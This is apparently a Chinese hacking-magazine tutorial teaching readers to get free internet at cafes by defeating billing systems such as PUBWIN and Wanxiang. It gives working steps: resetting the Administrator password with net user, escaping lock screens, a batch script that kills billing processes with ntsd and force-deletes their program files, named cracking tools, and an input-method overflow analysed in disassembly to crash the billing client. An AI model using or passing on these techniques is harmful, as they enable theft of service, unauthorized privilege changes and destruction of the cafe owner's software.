具体的技巧和必备条件如下:

　　1.网吧客户机有硬盘

　　2.网吧客户机是安装Windows 2000或者Windows XP或者更高版本

　　3.网吧管理系统，有管理登陆的选项，我看了下，很多管理软件都有这个选项!

　　打开命令提示符的技巧:

　　开始——运行，输入cmd.exe

　　开始——程序——附件——命令提示符

　　系统盘——WINDOWS/WINNT——system32——cmd.exe，双击之

　　察看当前用户的权限——net user 用户

　　怎么知道当前用户呢？

　　1)开始——那里有个注销XXX；XXX就是当前登录的用户

　　2)打开命令提示符，之后，会有这些信息:

　　Microsoft Windows XP [版本 5.1.2600]

　　(C) 版权所有 1985-2001 Microsoft Corp.

　　C:/Documents and Settings/XXX>

　　这里的XXX也就是当前登录的用户

　　好，现在我们执行

　　net user XXX

　　在屏幕回滚得信息中找到——

　　本地组成员 *Administrators

　　这就意味着当前用户已经是管理员组了，恭喜你，现在，你可以修改Administrator的密码了，命令如下

　　net user Administrator weiguo520

　　这样，系统管理员的密码已经改成了weiguo520

　　现在可以找老板结帐了，回头，找到那台机器，以管理员的身份登陆系统！

　　网吧免费上网的7种武器

　　网络江湖风起云涌，江湖代代人才出，传闻，当年江湖人士借助各种手段，致使肉鸡漫天飞，

　　网吧免费上，着实令菜鸟们口水流了一地，大叹：生不逢时，技不如人，未遇名师，做事太难。

　　菜菜帮菜鸟堂堂主小行（本堂最菜的当选为堂主）行走江湖，寻找各个门派的免费上网密招，偶得七种武器,不敢独享，拿来与菜鸟们分享，同时希望老鸟们给予指正，综观各个网吧门派，为了限制其他门派纷纷使用各派的镇派之宝，如航母级的PIBWIN，神兵利器万象网管，宝物美萍网管大师，记费王，本文针对此4件宝物给予破解技巧。

　　1.长生剑----键盘的SLEEP键和WAKE UP键`

　　出自：WINXP SP2

　　表演测试：WINXP SP2

　　当你在网吧上网的时候，当到时间后，机器都会被锁定，这个时候你可以按SLEEP键，（不要说，你

　　不知道是那个健啊），然后你会发现显示器会逐渐的转化为待机状态，再按WAKE UP 键，你仔细的盯着显示器，会看到屏幕慢慢清晰，计费系统就会消失掉了，锁定就被解除了，接下来不用我明说了吧，都知道怎么去做,那就是只要不被网管发现,想上多久,就上多久.

　　高人点评：计费系统可以限制用户的待机，注销权限，是通过屏蔽相关选项按纽的技巧来实现的，但很多键盘可以通过按键设置直接调用系统的待机或休眠命令，饶开计费系统本身的限制，由于待机命令和计费系统有冲突，一旦进入了待机状态，计费系统也自然就失败了。

　　2.霸王枪---U盘

　　出自：WIN98系统

　　表演测试：WIN98系统

　　很多时候我们需要用U盘存储东西，插入U盘后，系统提示要安装相应的驱动程序，选择手动安装方式，通过查找驱动位置的浏览窗口，调用EXPLORER.EXE 进程，桌面就显示出来，这个时候计费系统就型同虚设了，另外现在手机功能越来越多，小菜我那天 拍了自己的照片拿去传到网上，系统是 2000系统，桌面安装的是逍遥游记费软件，杀毒软件安装的是瑞星，当我把数据线插入机器后，瑞星大叔马上很勤快的提示，发现可疑进程，提示的是发现了逍遥游进程，问我是不是查杀，我毫不客气的选择查杀，结果吗？是需要重新启动才可以发挥作用，而机器是还原精灵，我当时比较忙，就没有去破，但我想这个思路是可行的，那位大哥有条件的测试下吧。

　　高人点评：WIN98没有内置的 USB设备的驱动程序，因此才可以轻松的破解，至于为什么2000里，为什么瑞星会查杀，就有待研究了。

　　3.碧玉刀---三键客

　　CTRL+ALT+DEL组合键

　　出自：WINXP SP2

　　表演测试:WINXP SP2

　　计费系统在系统启动后加载，自动担任起向上网的会员收钱的重任，所以在计费系统加载前，用

　　CTRL+ALT+DEL组合键调出任务管理器，发现一个进程，杀掉一个进程，只要时间把握的好，大家破这个还是十分简单的 。大部分会把任务管理器功能给关闭,这个可以在百度里搜"任务管理器解禁",很多的一搜就全出来了,这里我献上个不错的软件网吧辅助工具,有了它,什么任务管理器,硬件管理器,破起来那叫一个轻松.首先要在限制恢复里恢复所有限制并立即生效,见图1,接下来,就可以随便对那个任务管理器了,见下图怎么样是不是方便的很?

　　4 .拳头---干掉进程

　　BE.EXE （NORTON UTILITIES 8。0Z中一个文件，可以产生一个系统延时)

　　表演测试:

　　将计费系统的相关进程杀掉是最常用的手段，也是很好使的手段，无论是本地还是远程，这个都十分必要。

　　步骤一：找出计费系统的相关进程，用合法的帐户登陆计费系统，打开DOS窗口，输入TASKLIST 察看当前进程。

　　分析得知，PUBWIN.EXE为计费进程，RUN。EXE为监视进程，RECLOCK.EXE为截面锁定和权限限制

　　进程，尝试用TSKILL命令终止其中任一进程，发现均提示找不到该进程，看来只好请NTSL出山了。

　　步骤二：编写批处理文件

　　在计费系统中，一旦客户用账号登陆上机，服务端就会将该账号转为计费状态，即使客户

　　重起或终止计费进程，只要客户不执行下机命令，在服务端该账号就始终处在计费状态，因此要在下机后再执行相关命令，就要编写个批处理文件在后台运行，为了争取下机所需要的时间，要用到BE。EXE将他防到要创建的批处理文件同一目录，打开记事，输入一下内容 （//中为标注，不必输入）

　　BE delay 300 /让系统延时30秒，30秒后继续执行下面的内容/ ntsd -c q -p PID1/ 利用NTSD 杀计费系统进程，PID1 为进程 RUND1L。EXE的ID / ntsd -c q -p PID2/PID2为进程RECLOCK。EXE的ID / ntsd -c q -p PID3/PID3为进程RECLOCK。EXE的ID / cd C:/PROGRAM FILES/HINTSOFT/PUBCLT/进入pubwin运行文件目录，此处以Pubwin的默认安装目录为例/ del/f/s/q*.*/删除与计费系统相关的全部运行文件/ del C:/WINDOWS/system32/RUND1L.exe保存该文件并命名c.bat

　　步骤三：

　　运行C.bat，账号注销下机，静静的等待30秒，计费系统被无情的杀掉了，虽然任务拦无法显示，

　　但并不影响使用。

　　5.离别钩---专杀工具

　　专杀工具的发明是应了一物降一物的规律，他们可以解除各种限制，更厉害的是可以终止计费系统

　　并且操作十分简单，目前的专杀工具有，《PUBWIN4幽灵》，《美萍安全卫士破解器》，

　　《万象网管专家破解器》等这里给大家介绍个工具，Pubwin4幽灵 对付航母级的PIBWIN的十分管用.

　　可以点"清除计费软件",这样就不会记费了,但是唯一不好的是清除后总是提示我,说这个是违法的行为,很烦.其他几个大家自己找下吧，我一直认为菜鸟学东西，百度是最好的老师，所以你只要你掌握了关键词查找，找点东西，还是比较容易的啊

6.多情环 ---输入法漏洞

　　把输入法选中为智能ABC状态，这个时候在在网吧管理软件登陆口，你可以输入文字的地方，把光标移向那个地方，首先输入v，向上按下左箭头（移动任何一个方向键都可以） ，再按删除键 ，回车，后退键（有时要按二次后退键），然后立刻造成当前任何窗口进程死掉。关掉，重新来，就不记费了。一般系统只要这个BUG不被管理员处理掉，很多都是可以破的，不管是什么网吧管理软件，因为这是智能ABC输入法的BUG。

　　这里我做了下深化。用OD打开笔记本。然后切换输入法到智能ABC，输入v，左箭头，delete ，回车

　　（空格也可以）。然后立刻造成进程死掉，然后OD的信息会告诉你问题出在7380****.而7380****属

　　于winabc.ime的地址。经过跟踪，确定出错指令为ImeToAsciiEx函数。开始不知此函数是干中的，于是

　　查了一下，此函数是用来处理输入的字符。每按一个键就会调用一次，当上面这个动作做完后又调用了

　　0x7380AC95函数。

　　OD显法的内容如下：

　　7380ACA1 |> 66:81FE 3D80 CMP SI,803D ；si为你按的那个键的hex值

　　7380ACA6 |. 75 26 JNZ SHORT WINABC.7380ACCE

　　7380ACA8 |. 803D B0298173 >CMP BYTE PTR DS:[738129B0],3 ；3为输入中间阶段

　　7380ACAF |. 0F84 E7010000 JE WINABC.7380AE9C

　　7380ACB5 |. 833D AC298173 >CMP DWORD PTR DS:[738129AC],1

　　7380ACBC |. 0F8E DA010000 JLE WINABC.7380AE9C

　　7380ACC2 |. C605 B0298173 >MOV BYTE PTR DS:[738129B0],1

　　7380ACC9 |. E9 CE010000 JMP WINABC.7380AE9C

　　关于0x7380AC95的代码

　　7380ADB4 |> 56 PUSH ESI

　　7380ADB5 |. E8 58140000 CALL WINABC.7380C212

　　7380ADBA |. 85C0 TEST EAX,EAX

　　7380ADBC |. 74 20 JE SHORT WINABC.7380ADDE

　　7380ADBE |. 66:83FE 76 CMP SI,76 ; 与'v'比较

　　7380ADC2 |. C605 B0298173 >MOV BYTE PTR DS:[738129B0],3

　　7380ADC9 |. 0F94C0 SETE AL ; 不是的话al=0

　　7380ADCC |. A2 6C488173 MOV BYTE PTR DS:[7381486C],AL ; 是v的话进入v输入状态

　　7380ADD1 |. E8 F6110000 CALL WINABC.7380BFCC

　　7380ADD6 |. 391D CC558173 CMP DWORD PTR DS:[738155CC],EBX

　　7380ADDC |. EB 23 JMP SHORT WINABC.7380AE01

　　v的输入状态不同，比如Vabc 会输入abc英文，V1什么的为特殊字符和符号。

　　下面去找出问题的地方

　　7380AC81 |. 33DB XOR EBX,EBX

　　.......

　　7380AE08 |> 0FB7C6 MOVZX EAX,SI ; Case 3 of switch 7380ACE2

　　7380AE0B |. 50 PUSH EAX

　　7380AE0C |. E8 340A0000 CALL WINABC.7380B845

　　7380AE11 |. 2BC3 SUB EAX,EBX

　　7380AE13 |. 74 26 JE SHORT WINABC.7380AE3B

　　.......

　　7380AE3B |> 381D 6C488173 CMP BYTE PTR DS:[7381486C],BL ;DS:[7381486C]=2

　　7380AE41 |. 74 22 JE SHORT WINABC.7380AE65 ;没有发生跳转，正常情况下0x73811F52肯定大于0

　　7380AE43 |. 0FB705 521F817>MOVZX EAX,WORD PTR DS:[73811F52] ;DS:[73811F52]为0

　　7380AE4A |. 48 DEC EAX ;FFFFFFFF

　　7380AE4B |. C605 CC758173 >MOV BYTE PTR DS:[738175CC],2

　　7380AE52 |. 50 PUSH EAX

　　7380AE53 |. 68 561F8173 PUSH WINABC.73811F56

　　7380AE58 |. E8 FA140000 CALL WINABC.7380C357

　　7380AE5D |. 881D 6C488173 MOV BYTE PTR DS:[7381486C],BL ;函数将发生错误

　　7380AE63 |. EB 31 JMP SHORT WINABC.7380AE96

　　如果del删去V,DS:[73811F52]变量为0,但是DS:[7381486C]=2没有变为0，仍然在输入中途状态，dec eax是为了取得除了v之外的字母串的长度，结果这里变为 0xffffffff，7380AE5D |. 881D 6C488173 MOV BYTE PTR DS:[7381486C],BL 中 函数没有做检查。

　　7380C4C8 0FB745 10 MOVZX EAX,WORD PTR SS:[EBP+10] ; eax = 0xffff

　　7380C4CC 8BC8 MOV ECX,EAX

　　7380C4CE 8BFB MOV EDI,EBX

　　7380C4D0 037B 58 ADD EDI,DWORD PTR DS:[EBX+58]

　　7380C4D3 03F3 ADD ESI,EBX

　　7380C4D5 8B75 0C MOV ESI,DWORD PTR SS:[EBP+C]

　　7380C4D8 8BD1 MOV EDX,ECX

　　7380C4DA C1E9 02 SHR ECX,2 ; ecx = 0x3fff

　　7380C4DD 8943 54 MOV DWORD PTR DS:[EBX+54],EAX

　　7380C4E0 03C3 ADD EAX,EBX

　　7380C4E2 F3:A5 REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS> ; 拷贝0x3fff个int

　　看到了吗，出错的地方。在这里溢出了。

　　还有这个问题

　　7380B416 /$ 803D C0558173 >CMP BYTE PTR DS:[738155C0],0AA

　　7380B41D |. 56 PUSH ESI

　　7380B41E |. 74 2D JE SHORT WINABC.7380B44D

　　7380B420 |. 66:8B0D 545E81>MOV CX,WORD PTR DS:[73815E54] ; cx = 0

　　7380B427 |. 66:49 DEC CX ; cx = 0xffff

　　7380B429 |. 0FB7C1 MOVZX EAX,CX

　　7380B42C |. 66:890D 545E81>MOV WORD PTR DS:[73815E54],CX

　　7380B433 |. 0FB690 405E817>MOVZX EDX,BYTE PTR DS:[EAX+73815E40]

　　7380B43A |. 0FB680 415E817>MOVZX EAX,BYTE PTR DS:[EAX+73815E41]

　　注：

　　ds:0x73815E54表示当前输入栏中有多少字/词 DS:[738129B0]=0时上面的代码会被用到。当用退格消去输入栏中最后一个汉字时DS:[73815E54]=0,DS:[738129B0]应该变成3,表示进入输入状态.但是我们随便输入一个词，然后输入任意字符，按"←"，退格，回车，在输入框中得到前一词的默认字，然后连按两次退格。输入第一个退格键,DS:[73815E54]=1,可是DS:[738129B0]并没有变成3,再次按下退格键,函数又执行到这里，cx变为0xffff，就出错了。

　　因为程序可以导致IME所HOOK的进程退出。所以像万象那样的网吧管理软件会立刻出错而退出进程，这样你也就达到了免费上网的目的。

　　7.孔雀翎----美萍自带序列号漏洞

　　在本刊7月号上赵学通的 《破解美萍新招》上介绍过，这里就不详细说了。

　　几款武器的介绍，相信菜鸟们在网络的大江湖内定会有所收获，因为现在的大部分的网络管理员意识

　　还是很差，好了，心动不如行动，我就不多说了，要不都说我象唐僧了，最后提醒下，即使你可以

　　轻松的免费了，也必须悠着点，那样太免费多了，可是不好的啊，如果大家有什么问题，欢迎到

　　黑客X档案论坛去，每天在那里等候大家。